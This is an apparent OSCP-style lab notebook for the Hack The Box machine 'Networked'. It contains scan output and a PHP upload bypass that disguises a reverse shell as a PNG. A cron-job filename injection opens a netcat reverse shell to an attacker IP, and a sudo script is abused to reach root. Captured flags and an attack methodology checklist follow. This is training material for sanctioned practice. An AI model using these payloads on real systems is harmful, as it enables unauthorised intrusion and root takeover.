10.10.10.146 - Networked

Enumeration - TCP

    nmap -sC -sV -Pn -oA ./networked 10.10.10.146

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 11:20 EDT
    Nmap scan report for 10.10.10.146
    Host is up (0.064s latency).
    Not shown: 997 filtered ports
    PORT    STATE  SERVICE VERSION
    22/tcp  open   ssh     OpenSSH 7.4 (protocol 2.0)
    | ssh-hostkey:
    |   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
    |   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
    |_  256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
    80/tcp  open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
    |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
    |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
    443/tcp closed https

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 26.21 seconds

Enumeration - Web Services - Dirb\DirBuster

    gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.146

    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://10.10.10.146
    [+] Threads:        10
    [+] Wordlist:       /usr/share/dirb/wordlists/big.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Timeout:        10s
    ===============================================================
    2020/04/08 11:24:33 Starting gobuster
    ===============================================================
    /.htaccess (Status: 403)
    /.htpasswd (Status: 403)
    /backup (Status: 301)
    /cgi-bin/ (Status: 403)
    /uploads (Status: 301)
    ===============================================================
    2020/04/08 11:26:40 Finished
    ===============================================================

Exploitation

Service Exploited:
Vulnerability Type:
Exploit POC:
Description:

Discovery of Vulnerability

In the upload.php file:

    if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
        echo '<pre>Invalid image file.</pre>';
        displayform();
    }

In the lib.php file:

    function check_file_type($file) {
        $mime_type = file_mime_type($file);
        if (strpos($mime_type, 'image/') === 0) {
            return true;
        } else {
            return false;
        }
    }

    if (function_exists('mime_content_type')) {
        $file_type = @mime_content_type($file['tmp_name']);
        if (strlen($file_type) > 0) {
            return $file_type;
        }
    }

    list($foo, $ext) = getnameUpload($myFile["name"]);
    $validext = array('.jpg', '.png', '.gif', '.jpeg');
    $valid = false;
    foreach ($validext as $vext) {
        if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
            $valid = true;
        }
    }
    $name = str_replace('.', '_', $_SERVER['REMOTE_ADDR']) . '.' . $ext;

Exploit Code Used

    echo '89 50 4E 47 0D 0A 1A 0A' | xxd -p -r > networkshell.php.png
    cat ./php-reverse-shell.php >> networkshell.php.png

Proof\Local.txt File
☐ Screenshot with ifconfig\ipconfig
☐ Submit to OSCP Exam Panel

Post Exploitation

Shell as Apache. Lateral to Guly using the 3 minute cron job check_attack.php

Running Processes

Shell as Apache. Lateral to Guly using the 3 minute cron job check_attack.php

    cd /var/www/html/uploads
    touch ';nc 10.10.14.27 4444 -c bash'

Gets to GULY shell

Priv Escalation

Service Exploited:
Vulnerability Type:
Exploit POC:
Description:

Discovery of Vulnerability

    [guly@networked ~]$ sudo -l
    sudo -l
    Matching Defaults entries for guly on networked:
        !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset,
        env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
        env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
        env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
        env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
        env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
        secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

    User guly may run the following commands on networked:
        (root) NOPASSWD: /usr/local/sbin/changename.sh

Exploit Code Used

    #!/bin/bash -p
    cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
    DEVICE=guly0
    ONBOOT=no
    NM_CONTROLLED=no
    EoF
    regexp="^[a-zA-Z0-9_\ /-]+$"
    for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
        echo "interface $var :"
        read x
        while [[ ! $x =~ $regexp ]]; do
            echo "wrong input, try again"
            echo "interface $var :"
            read x
        done
        echo $var = $x >> /etc/sysconfig/network-scripts/ifcfg-guly
    done
    /sbin/ifup guly0

    [guly@networked ~]$ sudo /usr/local/sbin/changename.sh
    sudo /usr/local/sbin/changename.sh
    interface NAME:
    abc /bin/bash
    abc /bin/bash
    interface PROXY_METHOD:
    abc
    abc
    interface BROWSER_ONLY:
    abc
    abc
    interface BOOTPROTO:
    abc
    abc
    [root@networked network-scripts]# ifconfig
    ifconfig
    bash: ifconfig: command not found
    [root@networked network-scripts]# whoami
    whoami
    root

Proof\Local.txt File
☐ Screenshot with ifconfig\ipconfig
☐ Submit to OSCP Exam Panel

Goodies - Proof\Flags\Other

User - 526cfc2305f17faaacecf212c57d71c5
Root - 0a8ecda83f1d81251099e8ac3d0dcb82

Notebook template sections (10.x.x.x)

Enumeration, TCP, UDP, Web Services, Nikto, Dirb\DirBuster, WebDav, CMS, Other Services, SMB, SNMP, DB, Other, Exploitation, Post Exploitation, Script Results, Host Information (Operating System, Architecture, Domain, Installed Updates), Network (IPConfig\IFConfig, Network Processes, ARP, DNS, Route), Users & Groups (Users, Groups), Installed Applications, Running Processes (Process List), Scheduled Jobs (Scheduled Tasks), File System (Writeable Files\Directories, Directory List), Goodies (Passwords, Hashes, Proof\Flags\Other), Priv Escalation, Log Book, Methodology

Methodology

Network Scanning
☐ nmap -sn 10.11.1.*
☐ nmap -sL 10.11.1.*
☐ nbtscan -r 10.11.1.0/24
☐ smbtree
Software Versions
Potential Exploits

Individual Host Scanning
☐ nmap --top-ports 20 --open -iL iplist.txt
☐ nmap -sS -A -sV -O -p- ipaddress
☐ nmap -sU ipaddress

Service Scanning
WebApp
☐ Nikto
☐ dirb
☐ dirbuster
☐ wpscan
☐ dotdotpwn
☐ view source
☐ davtest\cadevar
☐ droopscan
☐ joomscan
☐ LFI\RFI Test
Linux\Windows
☐ snmpwalk -c public -v1 ipaddress 1
☐ smbclient -L //ipaddress
☐ showmount -e ipaddress port
☐ rpcinfo
☐ Enum4Linux
Anything Else
☐ nmap scripts (locate *nse* | grep servicename)
☐ hydra
☐ MSF Aux Modules
☐ Download the software

Exploitation
☐ Gather Version Numbers
☐ Searchsploit
☐ Default Creds
☐ Creds Previously Gathered
☐ Download the software

Post Exploitation
Linux
☐ linux-local-enum.sh
☐ linuxprivchecker.py
☐ linux-exploit-suggestor.sh
☐ unix-privesc-check.py
Windows
☐ wpc.exe
☐ windows-exploit-suggestor.py
☐ windows_privesc_check.py
☐ windows-privesc-check2.exe

Priv Escalation
☐ access internal services (portfwd)
☐ add account
Windows
☐ List of exploits
Linux
☐ sudo su
☐ KernelDB
☐ Searchsploit

Final
☐ Screenshot of IPConfig\WhoamI
☐ Copy proof.txt
☐ Dump hashes
☐ Dump SSH Keys
☐ Delete files